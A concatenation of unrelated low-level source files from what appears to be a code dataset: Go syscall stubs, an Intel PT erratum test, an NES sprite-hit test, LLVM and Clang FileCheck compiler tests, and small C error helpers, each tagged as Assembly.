TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
; Copyright (c) 2015-2020, Intel Corporation
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions are met:
;
; * Redistributions of source code must retain the above copyright notice,
; this list of conditions and the following disclaimer.
; * Redistributions in binary form must reproduce the above copyright notice,
; this list of conditions and the following disclaimer in the documentation
; and/or other materials provided with the distribution.
; * Neither the name of Intel Corporation nor the names of its contributors
; may be used to endorse or promote products derived from this software
; without specific prior written permission.
;
; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
; ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
; LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
; CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
; SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
; INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
; CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
; ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
; POSSIBILITY OF SUCH DAMAGE.
; SKD010: Intel(R) PT FUP May be Dropped After OVF.
;
; Some Intel PT (Intel Processor Trace) OVF (Overflow) packets may not
; be followed by a FUP (Flow Update Packet) or TIP.PGE (Target IP
; Packet, Packet Generation Enable).
;
; cpu 6/78
; cpu 6/94
; cpu 6/142
; cpu 6/158
; cpu 6/165
; cpu 6/166
;
; Variant: Missing FUP, sync at MODE.TSX + FUP.
;
org 0x1000
bits 64
; @pt p0: psb()
; @pt p1: mode.exec(64bit)
; @pt p2: psbend()
; @pt p3: ovf()
; fup missing
; @pt p4: mode.tsx(begin)
; @pt p5: fup(3: %l0)
l0: nop
; @pt p6: fup(1: %l1)
; @pt p7: tip.pgd(0: %l2)
l1: nop
l2: hlt
; @pt .exp(ptdump)
;%0p0 psb
;%0p1 mode.exec cs.l
;%0p2 psbend
;%0p3 ovf
;%0p4 mode.tsx intx
;%0p5 fup 3: %?l0
;%0p6 fup 1: %?l1.2
;%0p7 tip.pgd 0: %?l2.0
; @pt .exp(ptxed)
;[overflow]
;[begin transaction]
;? %0l0
;[disabled]
| {
"language": "Assembly"
} |
; Tests basic sprite 0 hit double-height operation.
.include "prefix_sprite_hit.a"
test_name:
.db "SPRITE HIT DOUBLE HEIGHT",0
.code
; Entry point: switch the PPU to 8x16 (double-height) sprites, draw one
; solid background tile mid-screen, then slide a double-height sprite
; around it so that only the sprite's LOWER 8x8 tile can touch the tile.
; Each sub-test loads a result code into A before checking, so a failure
; reports which placement misbehaved.
reset:
	jsr begin_sprite_hit_tests
	lda #$20 ; double-height sprites
	sta $2000		; PPUCTRL bit 5 = 8x16 sprite mode

	; Single solid tile in middle of screen
	lda #$21
	ldx #$f0
	jsr set_vaddr		; VRAM $21F0: nametable row 15 (y 120-127), col 16 (x 128-135)
	lda #solid_tile
	sta $2007		; write tile via PPUDATA

	lda #0
	sta sprite_attr
	lda #0 ; tiles 0 and 1
	sta sprite_tile

	; Sprite top at Y=119: lower tile sits just below the bg tile.
	ldx #128
	ldy #119
	jsr set_sprite_xy
	lda #2;) Lower sprite tile should miss bottom of bg tile
	ldx #$18		; parameter to the check helper -- TODO confirm meaning
	jsr sprite_should_miss

	; One line higher: lower tile now overlaps the bg tile's bottom row.
	ldx #128
	ldy #118
	jsr set_sprite_xy
	lda #3;) Lower sprite tile should hit bottom of bg tile
	ldx #$18
	jsr sprite_should_hit

	; NOTE(review): result code 3 is reused here for a different
	; sub-test (codes run 2,3,3,4); codes are normally unique per
	; failure -- verify against the other tests in this suite.
	; Lower tile ends just above the bg tile's top row.
	ldx #128
	ldy #103
	jsr set_sprite_xy
	lda #3;) Lower sprite tile should miss top of bg tile
	ldx #$18
	jsr sprite_should_miss

	; One line lower: lower tile reaches the bg tile's top row.
	ldx #128
	ldy #104
	jsr set_sprite_xy
	lda #4;) Lower sprite tile should hit top of bg tile
	ldx #$18
	jsr sprite_should_hit

	jmp tests_passed
| {
"language": "Assembly"
} |
; RUN: opt < %s -pgo-icall-prom -S | FileCheck %s --check-prefix=ICALL-PROM
; RUN: opt < %s -passes=pgo-icall-prom -S | FileCheck %s --check-prefix=ICALL-PROM
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
@foo = common global i32 (i32, ...)* null, align 8
define i32 @va_func(i32 %num, ...) {
entry:
ret i32 0
}
define i32 @bar() #1 {
entry:
%tmp = load i32 (i32, ...)*, i32 (i32, ...)** @foo, align 8
; ICALL-PROM: [[CMP:%[0-9]+]] = icmp eq i32 (i32, ...)* %tmp, @va_func
; ICALL-PROM: br i1 [[CMP]], label %if.true.direct_targ, label %if.false.orig_indirect, !prof [[BRANCH_WEIGHT:![0-9]+]]
; ICALL-PROM:if.true.direct_targ:
; ICALL-PROM: [[DIRCALL_RET:%[0-9]+]] = call i32 (i32, ...) @va_func(i32 3, i32 12, i32 22, i32 4)
; ICALL-PROM: br label %if.end.icp
%call = call i32 (i32, ...) %tmp(i32 3, i32 12, i32 22, i32 4), !prof !1
; ICALL-PROM:if.false.orig_indirect:
; ICALL-PROM: %call = call i32 (i32, ...) %tmp(i32 3, i32 12, i32 22, i32 4)
; ICALL-PROM: br label %if.end.icp
ret i32 %call
; ICALL-PROM:if.end.icp:
; ICALL-PROM: [[PHI_RET:%[0-9]+]] = phi i32 [ %call, %if.false.orig_indirect ], [ [[DIRCALL_RET]], %if.true.direct_targ ]
; ICALL-PROM: ret i32 [[PHI_RET]]
}
!1 = !{!"VP", i32 0, i64 12345, i64 989055279648259519, i64 12345}
; ICALL-PROM: [[BRANCH_WEIGHT]] = !{!"branch_weights", i32 12345, i32 0}
| {
"language": "Assembly"
} |
/*
* CDDL HEADER START
*
* This file and its contents are supplied under the terms of the
* Common Development and Distribution License ("CDDL"), version 1.0.
* You may only use this file in accordance with the terms of version
* 1.0 of the CDDL.
*
* A full copy of the text of the CDDL should have accompanied this
* source. A copy of the CDDL is also available via the Internet at
* http://www.illumos.org/license/CDDL.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/SYSTEMXVI.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright 2020 David MacKay. All rights reserved.
* Use is subject to license terms.
*/
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
/* Print STR followed by the current errno's message on stderr (via
   perror), then terminate the process with EXIT_FAILURE.
   Never returns. */
void perror_fatal (const char * str)
{
	perror (str);
	exit (EXIT_FAILURE);
}
/* printf-style fatal error: format FMT with the variadic arguments
   onto stderr, then terminate with EXIT_FAILURE.  No newline is
   appended -- callers must include one in FMT if they want it.
   Never returns. */
void error_fatal (const char * fmt, ...)
{
	va_list args;

	va_start (args, fmt);
	vfprintf (stderr, fmt, args);
	va_end (args);

	exit (EXIT_FAILURE);
} | {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for arm, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
// func Syscall(trap, a1, a2, a3 uintptr) (r1, r2, err uintptr)
// Forwarded to package syscall's implementation (the runtime knows
// about that entry point).
TEXT ·Syscall(SB),NOSPLIT,$0-28
	B	syscall·Syscall(SB)

// func Syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2, err uintptr)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
	B	syscall·Syscall6(SB)

// func SyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr)
// Variant for syscalls that never fail: no errno result is produced
// and r2 is hard-wired to 0 below.
TEXT ·SyscallNoError(SB),NOSPLIT,$0-24
	BL	runtime·entersyscall(SB)	// tell the runtime this goroutine may block in the kernel
	MOVW	trap+0(FP), R7			// Linux EABI: syscall number goes in R7
	MOVW	a1+4(FP), R0			// arguments in R0-R2
	MOVW	a2+8(FP), R1
	MOVW	a3+12(FP), R2
	MOVW	$0, R3				// zero the unused argument registers
	MOVW	$0, R4
	MOVW	$0, R5
	SWI	$0				// trap into the kernel
	MOVW	R0, r1+16(FP)			// primary result from R0
	MOVW	$0, R0
	MOVW	R0, r2+20(FP)			// r2 is always 0 on arm
	BL	runtime·exitsyscall(SB)
	RET

// func RawSyscall(trap, a1, a2, a3 uintptr) (r1, r2, err uintptr)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
	B	syscall·RawSyscall(SB)

// func RawSyscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2, err uintptr)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
	B	syscall·RawSyscall6(SB)

// func RawSyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr)
// Like SyscallNoError but without entersyscall/exitsyscall: must only
// be used where blocking the runtime is acceptable (no scheduler
// notification happens here).
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-24
	MOVW	trap+0(FP), R7	// syscall entry
	MOVW	a1+4(FP), R0
	MOVW	a2+8(FP), R1
	MOVW	a3+12(FP), R2
	SWI	$0
	MOVW	R0, r1+16(FP)
	MOVW	$0, R0
	MOVW	R0, r2+20(FP)	// r2 is always 0 on arm
	RET

// Forward seek to package syscall (needs special 64-bit-offset handling).
TEXT ·seek(SB),NOSPLIT,$0-28
	B	syscall·seek(SB)
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -triple x86_64-unknown-unknown -w -S -o - -emit-llvm %s | FileCheck %s -check-prefix=NO__ERRNO
// RUN: %clang_cc1 -triple x86_64-unknown-unknown -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s -check-prefix=HAS_ERRNO
// RUN: %clang_cc1 -triple x86_64-unknown-unknown-gnu -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_GNU
// RUN: %clang_cc1 -triple x86_64-unknown-unknown-android -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_ANDROID
// RUN: %clang_cc1 -triple x86_64-unknown-windows-msvc -w -S -o - -emit-llvm -fmath-errno %s | FileCheck %s --check-prefix=HAS_ERRNO_WIN
// Test attributes and codegen of math builtins.
// Exercises every math builtin and, via the per-prefix CHECK lines, pins how
// Clang lowers each one in each errno mode: an LLVM intrinsic
// ([[READNONE_INTRINSIC]]), a readnone libcall ([[READNONE]]), a pure libcall
// ([[PURE]]), or a plain libcall that may set errno ([[NOT_READNONE]]).
// The CHECK comments are FileCheck assertions — do not edit them casually.
void foo(double *d, float f, float *fp, long double *l, int *i, const char *c) {
f = __builtin_fmod(f,f); f = __builtin_fmodf(f,f); f = __builtin_fmodl(f,f);
// NO__ERRNO: frem double
// NO__ERRNO: frem float
// NO__ERRNO: frem x86_fp80
// HAS_ERRNO: declare double @fmod(double, double) [[NOT_READNONE:#[0-9]+]]
// HAS_ERRNO: declare float @fmodf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fmodl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_atan2(f,f); __builtin_atan2f(f,f) ; __builtin_atan2l(f, f);
// NO__ERRNO: declare double @atan2(double, double) [[READNONE:#[0-9]+]]
// NO__ERRNO: declare float @atan2f(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atan2l(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atan2(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atan2f(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atan2l(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_copysign(f,f); __builtin_copysignf(f,f); __builtin_copysignl(f,f); __builtin_copysignf128(f,f);
// NO__ERRNO: declare double @llvm.copysign.f64(double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// NO__ERRNO: declare float @llvm.copysign.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.copysign.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare fp128 @llvm.copysign.f128(fp128, fp128) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.copysign.f64(double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO: declare float @llvm.copysign.f32(float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.copysign.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare fp128 @llvm.copysign.f128(fp128, fp128) [[READNONE_INTRINSIC]]
__builtin_fabs(f); __builtin_fabsf(f); __builtin_fabsl(f); __builtin_fabsf128(f);
// NO__ERRNO: declare double @llvm.fabs.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.fabs.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.fabs.f80(x86_fp80) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare fp128 @llvm.fabs.f128(fp128) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.fabs.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.fabs.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.fabs.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare fp128 @llvm.fabs.f128(fp128) [[READNONE_INTRINSIC]]
__builtin_frexp(f,i); __builtin_frexpf(f,i); __builtin_frexpl(f,i);
// NO__ERRNO: declare double @frexp(double, i32*) [[NOT_READNONE:#[0-9]+]]
// NO__ERRNO: declare float @frexpf(float, i32*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @frexpl(x86_fp80, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @frexp(double, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @frexpf(float, i32*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @frexpl(x86_fp80, i32*) [[NOT_READNONE]]
__builtin_huge_val(); __builtin_huge_valf(); __builtin_huge_vall(); __builtin_huge_valf128();
// NO__ERRNO-NOT: .huge
// NO__ERRNO-NOT: @huge
// HAS_ERRNO-NOT: .huge
// HAS_ERRNO-NOT: @huge
__builtin_inf(); __builtin_inff(); __builtin_infl(); __builtin_inff128();
// NO__ERRNO-NOT: .inf
// NO__ERRNO-NOT: @inf
// HAS_ERRNO-NOT: .inf
// HAS_ERRNO-NOT: @inf
__builtin_ldexp(f,f); __builtin_ldexpf(f,f); __builtin_ldexpl(f,f);
// NO__ERRNO: declare double @ldexp(double, i32) [[READNONE]]
// NO__ERRNO: declare float @ldexpf(float, i32) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @ldexpl(x86_fp80, i32) [[READNONE]]
// HAS_ERRNO: declare double @ldexp(double, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare float @ldexpf(float, i32) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @ldexpl(x86_fp80, i32) [[NOT_READNONE]]
__builtin_modf(f,d); __builtin_modff(f,fp); __builtin_modfl(f,l);
// NO__ERRNO: declare double @modf(double, double*) [[NOT_READNONE]]
// NO__ERRNO: declare float @modff(float, float*) [[NOT_READNONE]]
// NO__ERRNO: declare x86_fp80 @modfl(x86_fp80, x86_fp80*) [[NOT_READNONE]]
// HAS_ERRNO: declare double @modf(double, double*) [[NOT_READNONE]]
// HAS_ERRNO: declare float @modff(float, float*) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @modfl(x86_fp80, x86_fp80*) [[NOT_READNONE]]
__builtin_nan(c); __builtin_nanf(c); __builtin_nanl(c); __builtin_nanf128(c);
// NO__ERRNO: declare double @nan(i8*) [[PURE:#[0-9]+]]
// NO__ERRNO: declare float @nanf(i8*) [[PURE]]
// NO__ERRNO: declare x86_fp80 @nanl(i8*) [[PURE]]
// NO__ERRNO: declare fp128 @nanf128(i8*) [[PURE]]
// HAS_ERRNO: declare double @nan(i8*) [[PURE:#[0-9]+]]
// HAS_ERRNO: declare float @nanf(i8*) [[PURE]]
// HAS_ERRNO: declare x86_fp80 @nanl(i8*) [[PURE]]
// HAS_ERRNO: declare fp128 @nanf128(i8*) [[PURE]]
__builtin_nans(c); __builtin_nansf(c); __builtin_nansl(c); __builtin_nansf128(c);
// NO__ERRNO: declare double @nans(i8*) [[PURE]]
// NO__ERRNO: declare float @nansf(i8*) [[PURE]]
// NO__ERRNO: declare x86_fp80 @nansl(i8*) [[PURE]]
// NO__ERRNO: declare fp128 @nansf128(i8*) [[PURE]]
// HAS_ERRNO: declare double @nans(i8*) [[PURE]]
// HAS_ERRNO: declare float @nansf(i8*) [[PURE]]
// HAS_ERRNO: declare x86_fp80 @nansl(i8*) [[PURE]]
// HAS_ERRNO: declare fp128 @nansf128(i8*) [[PURE]]
__builtin_pow(f,f); __builtin_powf(f,f); __builtin_powl(f,f);
// NO__ERRNO: declare double @llvm.pow.f64(double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.pow.f32(float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.pow.f80(x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @pow(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @powf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @powl(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_powi(f,f); __builtin_powif(f,f); __builtin_powil(f,f);
// NO__ERRNO: declare double @llvm.powi.f64(double, i32) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.powi.f32(float, i32) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.powi.f80(x86_fp80, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.powi.f64(double, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.powi.f32(float, i32) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.powi.f80(x86_fp80, i32) [[READNONE_INTRINSIC]]
/* math */
__builtin_acos(f); __builtin_acosf(f); __builtin_acosl(f);
// NO__ERRNO: declare double @acos(double) [[READNONE]]
// NO__ERRNO: declare float @acosf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @acosl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @acos(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @acosf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @acosl(x86_fp80) [[NOT_READNONE]]
__builtin_acosh(f); __builtin_acoshf(f); __builtin_acoshl(f);
// NO__ERRNO: declare double @acosh(double) [[READNONE]]
// NO__ERRNO: declare float @acoshf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @acoshl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @acosh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @acoshf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @acoshl(x86_fp80) [[NOT_READNONE]]
__builtin_asin(f); __builtin_asinf(f); __builtin_asinl(f);
// NO__ERRNO: declare double @asin(double) [[READNONE]]
// NO__ERRNO: declare float @asinf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @asinl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @asin(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @asinf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @asinl(x86_fp80) [[NOT_READNONE]]
__builtin_asinh(f); __builtin_asinhf(f); __builtin_asinhl(f);
// NO__ERRNO: declare double @asinh(double) [[READNONE]]
// NO__ERRNO: declare float @asinhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @asinhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @asinh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @asinhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @asinhl(x86_fp80) [[NOT_READNONE]]
__builtin_atan(f); __builtin_atanf(f); __builtin_atanl(f);
// NO__ERRNO: declare double @atan(double) [[READNONE]]
// NO__ERRNO: declare float @atanf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atanl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atan(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atanf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atanl(x86_fp80) [[NOT_READNONE]]
__builtin_atanh(f); __builtin_atanhf(f); __builtin_atanhl(f);
// NO__ERRNO: declare double @atanh(double) [[READNONE]]
// NO__ERRNO: declare float @atanhf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @atanhl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @atanh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @atanhf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @atanhl(x86_fp80) [[NOT_READNONE]]
__builtin_cbrt(f); __builtin_cbrtf(f); __builtin_cbrtl(f);
// NO__ERRNO: declare double @cbrt(double) [[READNONE]]
// NO__ERRNO: declare float @cbrtf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @cbrtl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @cbrt(double) [[READNONE:#[0-9]+]]
// HAS_ERRNO: declare float @cbrtf(float) [[READNONE]]
// HAS_ERRNO: declare x86_fp80 @cbrtl(x86_fp80) [[READNONE]]
__builtin_ceil(f); __builtin_ceilf(f); __builtin_ceill(f);
// NO__ERRNO: declare double @llvm.ceil.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.ceil.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.ceil.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.ceil.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.ceil.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.ceil.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_cos(f); __builtin_cosf(f); __builtin_cosl(f);
// NO__ERRNO: declare double @llvm.cos.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.cos.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.cos.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @cos(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @cosf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @cosl(x86_fp80) [[NOT_READNONE]]
__builtin_cosh(f); __builtin_coshf(f); __builtin_coshl(f);
// NO__ERRNO: declare double @cosh(double) [[READNONE]]
// NO__ERRNO: declare float @coshf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @coshl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @cosh(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @coshf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @coshl(x86_fp80) [[NOT_READNONE]]
__builtin_erf(f); __builtin_erff(f); __builtin_erfl(f);
// NO__ERRNO: declare double @erf(double) [[READNONE]]
// NO__ERRNO: declare float @erff(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @erfl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @erf(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @erff(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @erfl(x86_fp80) [[NOT_READNONE]]
__builtin_erfc(f); __builtin_erfcf(f); __builtin_erfcl(f);
// NO__ERRNO: declare double @erfc(double) [[READNONE]]
// NO__ERRNO: declare float @erfcf(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @erfcl(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @erfc(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @erfcf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @erfcl(x86_fp80) [[NOT_READNONE]]
__builtin_exp(f); __builtin_expf(f); __builtin_expl(f);
// NO__ERRNO: declare double @llvm.exp.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.exp.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.exp.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @exp(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @expf(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @expl(x86_fp80) [[NOT_READNONE]]
__builtin_exp2(f); __builtin_exp2f(f); __builtin_exp2l(f);
// NO__ERRNO: declare double @llvm.exp2.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.exp2.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.exp2.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @exp2(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @exp2f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @exp2l(x86_fp80) [[NOT_READNONE]]
__builtin_expm1(f); __builtin_expm1f(f); __builtin_expm1l(f);
// NO__ERRNO: declare double @expm1(double) [[READNONE]]
// NO__ERRNO: declare float @expm1f(float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @expm1l(x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @expm1(double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @expm1f(float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @expm1l(x86_fp80) [[NOT_READNONE]]
__builtin_fdim(f,f); __builtin_fdimf(f,f); __builtin_fdiml(f,f);
// NO__ERRNO: declare double @fdim(double, double) [[READNONE]]
// NO__ERRNO: declare float @fdimf(float, float) [[READNONE]]
// NO__ERRNO: declare x86_fp80 @fdiml(x86_fp80, x86_fp80) [[READNONE]]
// HAS_ERRNO: declare double @fdim(double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @fdimf(float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fdiml(x86_fp80, x86_fp80) [[NOT_READNONE]]
__builtin_floor(f); __builtin_floorf(f); __builtin_floorl(f);
// NO__ERRNO: declare double @llvm.floor.f64(double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.floor.f32(float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.floor.f80(x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @llvm.floor.f64(double) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare float @llvm.floor.f32(float) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare x86_fp80 @llvm.floor.f80(x86_fp80) [[READNONE_INTRINSIC]]
__builtin_fma(f,f,f); __builtin_fmaf(f,f,f); __builtin_fmal(f,f,f);
// NO__ERRNO: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// NO__ERRNO: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO: declare double @fma(double, double, double) [[NOT_READNONE]]
// HAS_ERRNO: declare float @fmaf(float, float, float) [[NOT_READNONE]]
// HAS_ERRNO: declare x86_fp80 @fmal(x86_fp80, x86_fp80, x86_fp80) [[NOT_READNONE]]
// On GNU or Win, fma never sets errno, so we can convert to the intrinsic.
// HAS_ERRNO_GNU: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_GNU: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO_GNU: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO_ANDROID: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_ANDROID: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// HAS_ERRNO_ANDROID: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80) [[READNONE_INTRINSIC]]
// HAS_ERRNO_WIN: declare double @llvm.fma.f64(double, double, double) [[READNONE_INTRINSIC:#[0-9]+]]
// HAS_ERRNO_WIN: declare float @llvm.fma.f32(float, float, float) [[READNONE_INTRINSIC]]
// Long double is just double on win, so no f80 use/declaration.
// HAS_ERRNO_WIN-NOT: declare x86_fp80 @llvm.fma.f80(x86_fp80, x86_fp80, x86_fp80)
